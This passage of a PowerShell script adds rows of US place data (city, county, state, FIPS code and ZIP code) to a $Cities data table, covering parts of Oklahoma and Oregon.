$Cities.Rows.Add("Platter","Bryan","Oklahoma","OK","40","74753") + $null = $Cities.Rows.Add("Ringold","McCurtain","Oklahoma","OK","40","74754") + $null = $Cities.Rows.Add("Rufe","McCurtain","Oklahoma","OK","40","74755") + $null = $Cities.Rows.Add("Sawyer","Choctaw","Oklahoma","OK","40","74756") + $null = $Cities.Rows.Add("Soper","Choctaw","Oklahoma","OK","40","74759") + $null = $Cities.Rows.Add("Spencerville","Choctaw","Oklahoma","OK","40","74760") + $null = $Cities.Rows.Add("Swink","Choctaw","Oklahoma","OK","40","74761") + $null = $Cities.Rows.Add("Valliant","McCurtain","Oklahoma","OK","40","74764") + $null = $Cities.Rows.Add("Wright city","McCurtain","Oklahoma","OK","40","74766") + $null = $Cities.Rows.Add("Zcta 747hh","Bryan","Oklahoma","OK","40","747HH") + $null = $Cities.Rows.Add("Zcta 747xx","Pushmataha","Oklahoma","OK","40","747XX") + $null = $Cities.Rows.Add("Shawnee","Pottawatomie","Oklahoma","OK","40","74801") + $null = $Cities.Rows.Add("Zcta 74804","Pottawatomie","Oklahoma","OK","40","74804") + $null = $Cities.Rows.Add("Ada","Pontotoc","Oklahoma","OK","40","74820") + $null = $Cities.Rows.Add("Agra","Lincoln","Oklahoma","OK","40","74824") + $null = $Cities.Rows.Add("Allen","Pontotoc","Oklahoma","OK","40","74825") + $null = $Cities.Rows.Add("Asher","Pottawatomie","Oklahoma","OK","40","74826") + $null = $Cities.Rows.Add("Atwood","Hughes","Oklahoma","OK","40","74827") + $null = $Cities.Rows.Add("Boley","Okfuskee","Oklahoma","OK","40","74829") + $null = $Cities.Rows.Add("Bowlegs","Seminole","Oklahoma","OK","40","74830") + $null = $Cities.Rows.Add("Byars","McClain","Oklahoma","OK","40","74831") + $null = $Cities.Rows.Add("Carney","Lincoln","Oklahoma","OK","40","74832") + $null = $Cities.Rows.Add("Castle","Okfuskee","Oklahoma","OK","40","74833") + $null = $Cities.Rows.Add("Chandler","Lincoln","Oklahoma","OK","40","74834") + $null = $Cities.Rows.Add("Connerville","Johnston","Oklahoma","OK","40","74836") + $null = $Cities.Rows.Add("Cromwell","Seminole","Oklahoma","OK","40","74837") + $null = $Cities.Rows.Add("Dustin","Hughes","Oklahoma","OK","40","74839") + $null = $Cities.Rows.Add("Earlsboro","Pottawatomie","Oklahoma","OK","40","74840") + $null = $Cities.Rows.Add("Fittstown","Pontotoc","Oklahoma","OK","40","74842") + $null = $Cities.Rows.Add("Fitzhugh","Pontotoc","Oklahoma","OK","40","74843") + $null = $Cities.Rows.Add("Francis","Pontotoc","Oklahoma","OK","40","74844") + $null = $Cities.Rows.Add("Vernon","McIntosh","Oklahoma","OK","40","74845") + $null = $Cities.Rows.Add("Holdenville","Hughes","Oklahoma","OK","40","74848") + $null = $Cities.Rows.Add("Konawa","Seminole","Oklahoma","OK","40","74849") + $null = $Cities.Rows.Add("Lamar","Hughes","Oklahoma","OK","40","74850") + $null = $Cities.Rows.Add("Mc loud","Pottawatomie","Oklahoma","OK","40","74851") + $null = $Cities.Rows.Add("Macomb","Pottawatomie","Oklahoma","OK","40","74852") + $null = $Cities.Rows.Add("Maud","Pottawatomie","Oklahoma","OK","40","74854") + $null = $Cities.Rows.Add("Meeker","Lincoln","Oklahoma","OK","40","74855") + $null = $Cities.Rows.Add("Mill creek","Johnston","Oklahoma","OK","40","74856") + $null = $Cities.Rows.Add("Newalla","Cleveland","Oklahoma","OK","40","74857") + $null = $Cities.Rows.Add("Bearden","Okfuskee","Oklahoma","OK","40","74859") + $null = $Cities.Rows.Add("Paden","Okfuskee","Oklahoma","OK","40","74860") + $null = $Cities.Rows.Add("Prague","Lincoln","Oklahoma","OK","40","74864") + $null = $Cities.Rows.Add("Roff","Pontotoc","Oklahoma","OK","40","74865") + $null = $Cities.Rows.Add("Saint louis","Pottawatomie","Oklahoma","OK","40","74866") + $null = $Cities.Rows.Add("Sasakwa","Seminole","Oklahoma","OK","40","74867") + $null = $Cities.Rows.Add("Seminole","Seminole","Oklahoma","OK","40","74868") + $null = $Cities.Rows.Add("Sparks","Lincoln","Oklahoma","OK","40","74869") + $null = $Cities.Rows.Add("Harden city","Pontotoc","Oklahoma","OK","40","74871") + $null = $Cities.Rows.Add("Stratford","Garvin","Oklahoma","OK","40","74872") + $null = $Cities.Rows.Add("Tecumseh","Pottawatomie","Oklahoma","OK","40","74873") + $null = $Cities.Rows.Add("Tryon","Lincoln","Oklahoma","OK","40","74875") + $null = $Cities.Rows.Add("Wanette","Pottawatomie","Oklahoma","OK","40","74878") + $null = $Cities.Rows.Add("Weleetka","Okfuskee","Oklahoma","OK","40","74880") + $null = $Cities.Rows.Add("Wellston","Lincoln","Oklahoma","OK","40","74881") + $null = $Cities.Rows.Add("Wetumka","Hughes","Oklahoma","OK","40","74883") + $null = $Cities.Rows.Add("New lima","Seminole","Oklahoma","OK","40","74884") + $null = $Cities.Rows.Add("Zcta 748hh","Hughes","Oklahoma","OK","40","748HH") + $null = $Cities.Rows.Add("Arkoma","Le Flore","Oklahoma","OK","40","74901") + $null = $Cities.Rows.Add("Pocola","Le Flore","Oklahoma","OK","40","74902") + $null = $Cities.Rows.Add("Bokoshe","Le Flore","Oklahoma","OK","40","74930") + $null = $Cities.Rows.Add("Bunch","Adair","Oklahoma","OK","40","74931") + $null = $Cities.Rows.Add("Cameron","Le Flore","Oklahoma","OK","40","74932") + $null = $Cities.Rows.Add("Fanshawe","Le Flore","Oklahoma","OK","40","74935") + $null = $Cities.Rows.Add("Gans","Sequoyah","Oklahoma","OK","40","74936") + $null = $Cities.Rows.Add("Heavener","Le Flore","Oklahoma","OK","40","74937") + $null = $Cities.Rows.Add("Hodgen","Le Flore","Oklahoma","OK","40","74939") + $null = $Cities.Rows.Add("Howe","Le Flore","Oklahoma","OK","40","74940") + $null = $Cities.Rows.Add("Keota","Haskell","Oklahoma","OK","40","74941") + $null = $Cities.Rows.Add("Leflore","Le Flore","Oklahoma","OK","40","74942") + $null = $Cities.Rows.Add("Lequire","Haskell","Oklahoma","OK","40","74943") + $null = $Cities.Rows.Add("Mccurtain","Haskell","Oklahoma","OK","40","74944") + $null = $Cities.Rows.Add("Marble city","Sequoyah","Oklahoma","OK","40","74945") + $null = $Cities.Rows.Add("Moffett","Sequoyah","Oklahoma","OK","40","74946") + $null = $Cities.Rows.Add("Monroe","Le Flore","Oklahoma","OK","40","74947") + $null = $Cities.Rows.Add("Muldrow","Sequoyah","Oklahoma","OK","40","74948") + $null = $Cities.Rows.Add("Muse","Le Flore","Oklahoma","OK","40","74949") + $null = $Cities.Rows.Add("Panama","Le Flore","Oklahoma","OK","40","74951") + $null = $Cities.Rows.Add("Poteau","Le Flore","Oklahoma","OK","40","74953") + $null = $Cities.Rows.Add("Roland","Sequoyah","Oklahoma","OK","40","74954") + $null = $Cities.Rows.Add("Sallisaw","Sequoyah","Oklahoma","OK","40","74955") + $null = $Cities.Rows.Add("Shady point","Le Flore","Oklahoma","OK","40","74956") + $null = $Cities.Rows.Add("Octavia","McCurtain","Oklahoma","OK","40","74957") + $null = $Cities.Rows.Add("Spiro","Le Flore","Oklahoma","OK","40","74959") + $null = $Cities.Rows.Add("Stilwell","Adair","Oklahoma","OK","40","74960") + $null = $Cities.Rows.Add("Vian","Sequoyah","Oklahoma","OK","40","74962") + $null = $Cities.Rows.Add("Watson","McCurtain","Oklahoma","OK","40","74963") + $null = $Cities.Rows.Add("Watts","Adair","Oklahoma","OK","40","74964") + $null = $Cities.Rows.Add("Westville","Adair","Oklahoma","OK","40","74965") + $null = $Cities.Rows.Add("Wister","Le Flore","Oklahoma","OK","40","74966") + $null = $Cities.Rows.Add("Zcta 749hh","Adair","Oklahoma","OK","40","749HH") + $null = $Cities.Rows.Add("","Cimarron","Oklahoma","OK","40","79051") + $null = $Cities.Rows.Add("Antelope","Wasco","Oregon","OR","41","97001") + $null = $Cities.Rows.Add("Aurora","Marion","Oregon","OR","41","97002") + $null = $Cities.Rows.Add("Beavercreek","Clackamas","Oregon","OR","41","97004") + $null = $Cities.Rows.Add("Beaverton","Washington","Oregon","OR","41","97005") + $null = $Cities.Rows.Add("Aloha","Washington","Oregon","OR","41","97006") + $null = $Cities.Rows.Add("Aloha","Washington","Oregon","OR","41","97007") + $null = $Cities.Rows.Add("Zcta 97008","Washington","Oregon","OR","41","97008") + $null = $Cities.Rows.Add("Boring","Clackamas","Oregon","OR","41","97009") + $null = $Cities.Rows.Add("Brightwood","Clackamas","Oregon","OR","41","97011") + $null = $Cities.Rows.Add("Canby","Clackamas","Oregon","OR","41","97013") + $null = $Cities.Rows.Add("Bonneville","Hood River","Oregon","OR","41","97014") + $null = $Cities.Rows.Add("Clackamas","Clackamas","Oregon","OR","41","97015") + $null = $Cities.Rows.Add("Westport","Columbia","Oregon","OR","41","97016") + $null = $Cities.Rows.Add("Colton","Clackamas","Oregon","OR","41","97017") + $null = $Cities.Rows.Add("Columbia city","Columbia","Oregon","OR","41","97018") + $null = $Cities.Rows.Add("Corbett","Multnomah","Oregon","OR","41","97019") + $null = $Cities.Rows.Add("Donald","Marion","Oregon","OR","41","97020") + $null = $Cities.Rows.Add("Friend","Wasco","Oregon","OR","41","97021") + $null = $Cities.Rows.Add("Eagle creek","Clackamas","Oregon","OR","41","97022") + $null = $Cities.Rows.Add("Estacada","Clackamas","Oregon","OR","41","97023") + $null = $Cities.Rows.Add("Fairview","Multnomah","Oregon","OR","41","97024") + $null = $Cities.Rows.Add("Gervais","Marion","Oregon","OR","41","97026") + $null = $Cities.Rows.Add("Gladstone","Clackamas","Oregon","OR","41","97027") + $null = $Cities.Rows.Add("Timberline lodge","Clackamas","Oregon","OR","41","97028") + $null = $Cities.Rows.Add("Grass valley","Sherman","Oregon","OR","41","97029") + $null = $Cities.Rows.Add("Gresham","Multnomah","Oregon","OR","41","97030") + $null = $Cities.Rows.Add("Hood river","Hood River","Oregon","OR","41","97031") + $null = $Cities.Rows.Add("Hubbard","Marion","Oregon","OR","41","97032") + $null = $Cities.Rows.Add("Kent","Sherman","Oregon","OR","41","97033") + $null = $Cities.Rows.Add("Lake oswego","Clackamas","Oregon","OR","41","97034") + $null = $Cities.Rows.Add("Lake oswego","Clackamas","Oregon","OR","41","97035") + $null = $Cities.Rows.Add("Maupin","Wasco","Oregon","OR","41","97037") + $null = $Cities.Rows.Add("Molalla","Clackamas","Oregon","OR","41","97038") + $null = $Cities.Rows.Add("Moro","Sherman","Oregon","OR","41","97039") + $null = $Cities.Rows.Add("Mosier","Wasco","Oregon","OR","41","97040") + $null = $Cities.Rows.Add("Mount hood parkd","Hood River","Oregon","OR","41","97041") + $null = $Cities.Rows.Add("Mulino","Clackamas","Oregon","OR","41","97042") + $null = $Cities.Rows.Add("Oregon city","Clackamas","Oregon","OR","41","97045") + $null = $Cities.Rows.Add("Rainier","Columbia","Oregon","OR","41","97048") + $null = $Cities.Rows.Add("Zigzag","Clackamas","Oregon","OR","41","97049") + $null = $Cities.Rows.Add("Rufus","Sherman","Oregon","OR","41","97050") + $null = $Cities.Rows.Add("Saint helens","Columbia","Oregon","OR","41","97051") + $null = $Cities.Rows.Add("Warren","Columbia","Oregon","OR","41","97053") + $null = $Cities.Rows.Add("Deer island","Columbia","Oregon","OR","41","97054") + $null = $Cities.Rows.Add("Sandy","Clackamas","Oregon","OR","41","97055") + $null = $Cities.Rows.Add("Scappoose","Columbia","Oregon","OR","41","97056") + $null = $Cities.Rows.Add("The dalles","Wasco","Oregon","OR","41","97058") + $null = $Cities.Rows.Add("Troutdale","Multnomah","Oregon","OR","41","97060") + $null = $Cities.Rows.Add("Tualatin","Washington","Oregon","OR","41","97062") + $null = $Cities.Rows.Add("Wamic","Wasco","Oregon","OR","41","97063") + $null = $Cities.Rows.Add("Vernonia","Columbia","Oregon","OR","41","97064") + $null = $Cities.Rows.Add("Wasco","Sherman","Oregon","OR","41","97065") + $null = $Cities.Rows.Add("Welches","Clackamas","Oregon","OR","41","97067") + $null = $Cities.Rows.Add("West linn","Clackamas","Oregon","OR","41","97068") + $null = $Cities.Rows.Add("Wilsonville","Clackamas","Oregon","OR","41","97070") + $null = $Cities.Rows.Add("Woodburn","Marion","Oregon","OR","41","97071") + $null = $Cities.Rows.Add("Gresham","Multnomah","Oregon","OR","41","97080") + $null = $Cities.Rows.Add("Zcta 970hh","Clackamas","Oregon","OR","41","970HH") + $null = $Cities.Rows.Add("Zcta 970xx","Clackamas","Oregon","OR","41","970XX") + $null = $Cities.Rows.Add("Amity","Yamhill","Oregon","OR","41","97101") + $null = $Cities.Rows.Add("Arch cape","Clatsop","Oregon","OR","41","97102") + $null = $Cities.Rows.Add("Astoria","Clatsop","Oregon","OR","41","97103") + $null = $Cities.Rows.Add("Banks","Washington","Oregon","OR","41","97106") + $null = $Cities.Rows.Add("Bay city","Tillamook","Oregon","OR","41","97107") + $null = $Cities.Rows.Add("Beaver","Tillamook","Oregon","OR","41","97108") + $null = $Cities.Rows.Add("Buxton","Washington","Oregon","OR","41","97109") + $null = $Cities.Rows.Add("Cannon beach","Clatsop","Oregon","OR","41","97110") + $null = $Cities.Rows.Add("Carlton","Yamhill","Oregon","OR","41","97111") + $null = $Cities.Rows.Add("Cloverdale","Tillamook","Oregon","OR","41","97112") + $null = $Cities.Rows.Add("Cornelius","Washington","Oregon","OR","41","97113") + $null = $Cities.Rows.Add("Dayton","Yamhill","Oregon","OR","41","97114") + $null = $Cities.Rows.Add("Dundee","Yamhill","Oregon","OR","41","97115") + $null = $Cities.Rows.Add("Glenwood","Washington","Oregon","OR","41","97116") + $null = $Cities.Rows.Add("Gales creek","Washington","Oregon","OR","41","97117") + $null = $Cities.Rows.Add("Garibaldi","Tillamook","Oregon","OR","41","97118") + $null = $Cities.Rows.Add("Gaston","Washington","Oregon","OR","41","97119") + $null = $Cities.Rows.Add("Hammond","Clatsop","Oregon","OR","41","97121") + $null = $Cities.Rows.Add("Hebo","Tillamook","Oregon","OR","41","97122") + $null = $Cities.Rows.Add("Hillsboro","Washington","Oregon","OR","41","97123") + $null = $Cities.Rows.Add("Hillsboro","Washington","Oregon","OR","41","97124") + $null = $Cities.Rows.Add("Manning","Washington","Oregon","OR","41","97125") + $null = $Cities.Rows.Add("Lafayette","Yamhill","Oregon","OR","41","97127") + $null = $Cities.Rows.Add("Mcminnville","Yamhill","Oregon","OR","41","97128") + $null = $Cities.Rows.Add("Manzanita","Tillamook","Oregon","OR","41","97130") + $null = $Cities.Rows.Add("Nehalem","Tillamook","Oregon","OR","41","97131") + $null = $Cities.Rows.Add("Newberg","Yamhill","Oregon","OR","41","97132") + $null = $Cities.Rows.Add("North plains","Washington","Oregon","OR","41","97133") + $null = $Cities.Rows.Add("Oceanside","Tillamook","Oregon","OR","41","97134") + $null = $Cities.Rows.Add("Pacific city","Tillamook","Oregon","OR","41","97135") + $null = $Cities.Rows.Add("Rockaway","Tillamook","Oregon","OR","41","97136") + $null = $Cities.Rows.Add("Saint paul","Marion","Oregon","OR","41","97137") + $null = $Cities.Rows.Add("Gearhart","Clatsop","Oregon","OR","41","97138") + $null = $Cities.Rows.Add("Sherwood","Washington","Oregon","OR","41","97140") + $null = $Cities.Rows.Add("Tillamook","Tillamook","Oregon","OR","41","97141") + $null = $Cities.Rows.Add("Netarts","Tillamook","Oregon","OR","41","97143") + $null = $Cities.Rows.Add("Timber","Washington","Oregon","OR","41","97144") + $null = $Cities.Rows.Add("Tolovana park","Clatsop","Oregon","OR","41","97145") + $null = $Cities.Rows.Add("Warrenton","Clatsop","Oregon","OR","41","97146") + $null = $Cities.Rows.Add("Wheeler","Tillamook","Oregon","OR","41","97147") + $null = $Cities.Rows.Add("Yamhill","Yamhill","Oregon","OR","41","97148") + $null = $Cities.Rows.Add("Neskowin","Tillamook","Oregon","OR","41","97149") + $null = $Cities.Rows.Add("Zcta 971hh","Clatsop","Oregon","OR","41","971HH") + $null = $Cities.Rows.Add("Zcta 971xx","Tillamook","Oregon","OR","41","971XX") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97201") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97202") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97203") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97204") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97205") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97206") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97209") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97210") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97211") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97212") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97213") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97214") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97215") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97216") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97217") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97218") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97219") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97220") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97221") + $null = $Cities.Rows.Add("Milwaukie","Clackamas","Oregon","OR","41","97222") + $null = $Cities.Rows.Add("Garden home","Washington","Oregon","OR","41","97223") + $null = $Cities.Rows.Add("Tigard","Washington","Oregon","OR","41","97224") + $null = $Cities.Rows.Add("Cedar hills","Washington","Oregon","OR","41","97225") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97227") + $null = $Cities.Rows.Add("Portland","Washington","Oregon","OR","41","97229") + $null = $Cities.Rows.Add("Rockwood corners","Multnomah","Oregon","OR","41","97230") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97231") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97232") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97233") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97236") + $null = $Cities.Rows.Add("Portland","Multnomah","Oregon","OR","41","97266") + $null = $Cities.Rows.Add("Oak grove","Clackamas","Oregon","OR","41","97267") + $null = $Cities.Rows.Add("Zcta 972hh","Clackamas","Oregon","OR","41","972HH") + $null = $Cities.Rows.Add("Salem","Marion","Oregon","OR","41","97301") + $null = $Cities.Rows.Add("Salem","Marion","Oregon","OR","41","97302") + $null = $Cities.Rows.Add("Keizer","Marion","Oregon","OR","41","97303") + $null = $Cities.Rows.Add("Salem","Polk","Oregon","OR","41","97304") + $null = $Cities.Rows.Add("Brooks","Marion","Oregon","OR","41","97305") + $null = $Cities.Rows.Add("Salem","Marion","Oregon","OR","41","97306") + $null = $Cities.Rows.Add("Albany","Linn","Oregon","OR","41","97321") + $null = $Cities.Rows.Add("Alsea","Benton","Oregon","OR","41","97324") + $null = $Cities.Rows.Add("West stayton","Marion","Oregon","OR","41","97325") + $null = $Cities.Rows.Add("Blodgett","Lincoln","Oregon","OR","41","97326") + $null = $Cities.Rows.Add("Brownsville","Linn","Oregon","OR","41","97327") + $null = $Cities.Rows.Add("Cascadia","Linn","Oregon","OR","41","97329") + $null = $Cities.Rows.Add("Corvallis","Benton","Oregon","OR","41","97330") + $null = $Cities.Rows.Add("Corvallis","Benton","Oregon","OR","41","97331") + $null = $Cities.Rows.Add("Corvallis","Benton","Oregon","OR","41","97333") + $null = $Cities.Rows.Add("Dallas","Polk","Oregon","OR","41","97338") + $null = $Cities.Rows.Add("Depoe bay","Lincoln","Oregon","OR","41","97341") + $null = $Cities.Rows.Add("Detroit","Marion","Oregon","OR","41","97342") + $null = $Cities.Rows.Add("Eddyville","Lincoln","Oregon","OR","41","97343") + $null = $Cities.Rows.Add("Falls city","Polk","Oregon","OR","41","97344") + $null = $Cities.Rows.Add("Foster","Linn","Oregon","OR","41","97345") + $null = $Cities.Rows.Add("Gates","Marion","Oregon","OR","41","97346") + $null = $Cities.Rows.Add("Grand ronde","Polk","Oregon","OR","41","97347") + $null = $Cities.Rows.Add("Halsey","Linn","Oregon","OR","41","97348") + $null = $Cities.Rows.Add("Idanha","Linn","Oregon","OR","41","97350") + $null = $Cities.Rows.Add("Independence","Polk","Oregon","OR","41","97351") + $null = $Cities.Rows.Add("Jefferson","Marion","Oregon","OR","41","97352") + $null = $Cities.Rows.Add("Lebanon","Linn","Oregon","OR","41","97355") + $null = $Cities.Rows.Add("Logsden","Lincoln","Oregon","OR","41","97357") + $null = $Cities.Rows.Add("Lyons","Linn","Oregon","OR","41","97358") + $null = $Cities.Rows.Add("Mill city","Linn","Oregon","OR","41","97360") + $null = $Cities.Rows.Add("Monmouth","Polk","Oregon","OR","41","97361") + $null = $Cities.Rows.Add("Mount angel","Marion","Oregon","OR","41","97362") + $null = $Cities.Rows.Add("Neotsu","Lincoln","Oregon","OR","41","97364") + $null = $Cities.Rows.Add("Newport","Lincoln","Oregon","OR","41","97365") + $null = $Cities.Rows.Add("South beach","Lincoln","Oregon","OR","41","97366") + $null = $Cities.Rows.Add("Lincoln city","Lincoln","Oregon","OR","41","97367") + $null = $Cities.Rows.Add("Otis","Lincoln","Oregon","OR","41","97368") + $null = $Cities.Rows.Add("Philomath","Benton","Oregon","OR","41","97370") + $null = $Cities.Rows.Add("Rickreall","Polk","Oregon","OR","41","97371") + $null = $Cities.Rows.Add("Scio","Linn","Oregon","OR","41","97374") + $null = $Cities.Rows.Add("Scotts mills","Marion","Oregon","OR","41","97375") + $null = $Cities.Rows.Add("Seal rock","Lincoln","Oregon","OR","41","97376") + $null = $Cities.Rows.Add("Shedd","Linn","Oregon","OR","41","97377") + $null = $Cities.Rows.Add("Sheridan","Yamhill","Oregon","OR","41","97378") + $null = $Cities.Rows.Add("Siletz","Lincoln","Oregon","OR","41","97380") + $null = $Cities.Rows.Add("Silverton","Marion","Oregon","OR","41","97381") + $null = $Cities.Rows.Add("Stayton","Marion","Oregon","OR","41","97383") + $null = $Cities.Rows.Add("Sublimity","Marion","Oregon","OR","41","97385") + $null = $Cities.Rows.Add("Sweet home","Linn","Oregon","OR","41","97386") + $null = $Cities.Rows.Add("Tangent","Linn","Oregon","OR","41","97389") + $null = $Cities.Rows.Add("Tidewater","Lincoln","Oregon","OR","41","97390") + $null = $Cities.Rows.Add("Toledo","Lincoln","Oregon","OR","41","97391") + $null = $Cities.Rows.Add("Turner","Marion","Oregon","OR","41","97392") + $null = $Cities.Rows.Add("Waldport","Lincoln","Oregon","OR","41","97394") + $null = $Cities.Rows.Add("Willamina","Yamhill","Oregon","OR","41","97396") + $null = $Cities.Rows.Add("Zcta 973hh","Benton","Oregon","OR","41","973HH") + $null = $Cities.Rows.Add("Zcta 973xx","Linn","Oregon","OR","41","973XX") + $null = $Cities.Rows.Add("Coburg","Lane","Oregon","OR","41","97401") + $null = $Cities.Rows.Add("Eugene","Lane","Oregon","OR","41","97402") + $null = $Cities.Rows.Add("Eugene","Lane","Oregon","OR","41","97403") + $null = $Cities.Rows.Add("Eugene","Lane","Oregon","OR","41","97404") + $null = $Cities.Rows.Add("Eugene","Lane","Oregon","OR","41","97405") + $null = $Cities.Rows.Add("Agness","Curry","Oregon","OR","41","97406") + $null = $Cities.Rows.Add("Zcta 97408","Lane","Oregon","OR","41","97408") + $null = $Cities.Rows.Add("Azalea","Douglas","Oregon","OR","41","97410") + $null = $Cities.Rows.Add("Bandon","Coos","Oregon","OR","41","97411") + $null = $Cities.Rows.Add("Blachly","Lane","Oregon","OR","41","97412") + $null = $Cities.Rows.Add("Mc kenzie bridge","Lane","Oregon","OR","41","97413") + $null = $Cities.Rows.Add("Broadbent","Coos","Oregon","OR","41","97414") + $null = $Cities.Rows.Add("Harbor","Curry","Oregon","OR","41","97415") + $null = $Cities.Rows.Add("Camas valley","Douglas","Oregon","OR","41","97416") + $null = $Cities.Rows.Add("Canyonville","Douglas","Oregon","OR","41","97417") + $null = $Cities.Rows.Add("Cheshire","Lane","Oregon","OR","41","97419") + $null = $Cities.Rows.Add("Charleston","Coos","Oregon","OR","41","97420") + $null = $Cities.Rows.Add("Coquille","Coos","Oregon","OR","41","97423") + $null = $Cities.Rows.Add("Cottage grove","Lane","Oregon","OR","41","97424") + $null = $Cities.Rows.Add("Cascade summit","Klamath","Oregon","OR","41","97425") + $null = $Cities.Rows.Add("Creswell","Lane","Oregon","OR","41","97426") + $null = $Cities.Rows.Add("Culp creek","Lane","Oregon","OR","41","97427") + $null = $Cities.Rows.Add("Curtin","Douglas","Oregon","OR","41","97428") + $null = $Cities.Rows.Add("Days creek","Douglas","Oregon","OR","41","97429") + $null = $Cities.Rows.Add("Greenleaf","Lane","Oregon","OR","41","97430") + $null = $Cities.Rows.Add("Dexter","Lane","Oregon","OR","41","97431") + $null = $Cities.Rows.Add("Dorena","Lane","Oregon","OR","41","97434") + $null = $Cities.Rows.Add("Drain","Douglas","Oregon","OR","41","97435") + $null = $Cities.Rows.Add("Elkton","Douglas","Oregon","OR","41","97436") + $null = $Cities.Rows.Add("Elmira","Lane","Oregon","OR","41","97437") + $null = $Cities.Rows.Add("Fall creek","Lane","Oregon","OR","41","97438") + $null = $Cities.Rows.Add("Florence","Lane","Oregon","OR","41","97439") + $null = $Cities.Rows.Add("Gardiner","Douglas","Oregon","OR","41","97441") + $null = $Cities.Rows.Add("Glendale","Douglas","Oregon","OR","41","97442") + $null = $Cities.Rows.Add("Glide","Douglas","Oregon","OR","41","97443") + $null = $Cities.Rows.Add("Pistol river","Curry","Oregon","OR","41","97444") + $null = $Cities.Rows.Add("Harrisburg","Linn","Oregon","OR","41","97446") + $null = $Cities.Rows.Add("Idleyld park","Douglas","Oregon","OR","41","97447") + $null = $Cities.Rows.Add("Junction city","Lane","Oregon","OR","41","97448") + $null = $Cities.Rows.Add("Lakeside","Coos","Oregon","OR","41","97449") + $null = $Cities.Rows.Add("Langlois","Curry","Oregon","OR","41","97450") + $null = $Cities.Rows.Add("Lorane","Lane","Oregon","OR","41","97451") + $null = $Cities.Rows.Add("Lowell","Lane","Oregon","OR","41","97452") + $null = $Cities.Rows.Add("Mapleton","Lane","Oregon","OR","41","97453") + $null = $Cities.Rows.Add("Marcola","Lane","Oregon","OR","41","97454") + $null = $Cities.Rows.Add("Pleasant hill","Lane","Oregon","OR","41","97455") + $null = $Cities.Rows.Add("Monroe","Benton","Oregon","OR","41","97456") + $null = $Cities.Rows.Add("Myrtle creek","Douglas","Oregon","OR","41","97457") + $null = $Cities.Rows.Add("Myrtle point","Coos","Oregon","OR","41","97458") + $null = $Cities.Rows.Add("North bend","Coos","Oregon","OR","41","97459") + $null = $Cities.Rows.Add("Noti","Lane","Oregon","OR","41","97461") + $null = $Cities.Rows.Add("Oakland","Douglas","Oregon","OR","41","97462") + $null = $Cities.Rows.Add("Oakridge","Lane","Oregon","OR","41","97463") + $null = $Cities.Rows.Add("Port orford","Curry","Oregon","OR","41","97465") + $null = $Cities.Rows.Add("Powers","Coos","Oregon","OR","41","97466") + $null = $Cities.Rows.Add("Winchester bay","Douglas","Oregon","OR","41","97467") + $null = $Cities.Rows.Add("Riddle","Douglas","Oregon","OR","41","97469") + $null = $Cities.Rows.Add("Roseburg","Douglas","Oregon","OR","41","97470") + $null = $Cities.Rows.Add("Scottsburg","Douglas","Oregon","OR","41","97473") + $null = $Cities.Rows.Add("Sixes","Curry","Oregon","OR","41","97476") + $null = $Cities.Rows.Add("Springfield","Lane","Oregon","OR","41","97477") + $null = $Cities.Rows.Add("Springfield","Lane","Oregon","OR","41","97478") + $null = $Cities.Rows.Add("Sutherlin","Douglas","Oregon","OR","41","97479") + $null = $Cities.Rows.Add("Swisshome","Lane","Oregon","OR","41","97480") + $null = $Cities.Rows.Add("Tenmile","Douglas","Oregon","OR","41","97481") + $null = $Cities.Rows.Add("Tiller","Douglas","Oregon","OR","41","97484") + $null = $Cities.Rows.Add("Umpqua","Douglas","Oregon","OR","41","97486") + $null = $Cities.Rows.Add("Veneta","Lane","Oregon","OR","41","97487") + $null = $Cities.Rows.Add("Vida","Lane","Oregon","OR","41","97488") + $null = $Cities.Rows.Add("Leaburg","Lane","Oregon","OR","41","97489") + $null = $Cities.Rows.Add("Walton","Lane","Oregon","OR","41","97490") + $null = $Cities.Rows.Add("Westfir","Lane","Oregon","OR","41","97492") + $null = $Cities.Rows.Add("Westlake","Lane","Oregon","OR","41","97493") + $null = $Cities.Rows.Add("Winston","Douglas","Oregon","OR","41","97496") + $null = $Cities.Rows.Add("Sunny valley","Josephine","Oregon","OR","41","97497") + $null = $Cities.Rows.Add("Yachats","Lincoln","Oregon","OR","41","97498") + $null = $Cities.Rows.Add("Yoncalla","Douglas","Oregon","OR","41","97499") + $null = $Cities.Rows.Add("Zcta 974hh","Benton","Oregon","OR","41","974HH") + $null = $Cities.Rows.Add("Zcta 974xx","Douglas","Oregon","OR","41","974XX") + $null = $Cities.Rows.Add("West main","Jackson","Oregon","OR","41","97501") + $null = $Cities.Rows.Add("Central point","Jackson","Oregon","OR","41","97502") + $null = $Cities.Rows.Add("White city","Jackson","Oregon","OR","41","97503") + $null = $Cities.Rows.Add("Medford","Jackson","Oregon","OR","41","97504") + $null = $Cities.Rows.Add("Ashland","Jackson","Oregon","OR","41","97520") + $null = $Cities.Rows.Add("Butte falls","Jackson","Oregon","OR","41","97522") + $null = $Cities.Rows.Add("Cave junction","Josephine","Oregon","OR","41","97523") + $null = $Cities.Rows.Add("Eagle 